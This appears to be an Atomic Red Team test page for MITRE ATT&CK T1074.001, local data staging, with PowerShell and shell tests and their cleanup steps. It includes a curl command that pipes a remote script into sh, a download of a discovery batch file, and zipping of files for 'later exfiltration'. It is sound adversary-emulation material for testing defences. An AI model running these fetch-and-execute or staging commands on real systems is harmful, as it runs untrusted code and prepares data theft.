Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location. Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, verify that the file is saved in the temp directory.
Supported Platforms: Windows
auto_generated_guid: 107706a5-6f9f-451a-adae-bab8c667829f
| Name | Description | Type | Default Value | |——|————-|——|—————| | output_file | Location to save downloaded discovery.bat file | path | $env:TEMP\discovery.bat|
1
powershell
!1
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file}
1
Remove-Item -Force #{output_file} -ErrorAction Ignore
Utilize curl to download discovery.sh and execute a basic information gathering shell script
Supported Platforms: Linux, macOS
auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066
| Name | Description | Type | Default Value | |——|————-|——|—————| | output_file | Location to save downloaded discovery.bat file | path | /tmp/T1074.001_discovery.log|
1
sh
!1
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > #{output_file}
1
rm #{output_file}
1
sh
!1
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
1
which apt && apt update && apt install -y curl || which pkg && pkg update && pkg install -y curl
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory.
Supported Platforms: Windows
auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a
| Name | Description | Type | Default Value | |——|————-|——|—————| | output_file | Location to save zipped file or folder | path | $env:TEMP\Folder_to_zip.zip| | input_file | Location of file or folder to zip | path | PathToAtomicsFolder\T1074.001\bin\Folder_to_zip|
1
powershell
!1
Compress-Archive -Path "#{input_file}" -DestinationPath #{output_file} -Force
1
Remove-Item -Path #{output_file} -ErrorAction Ignore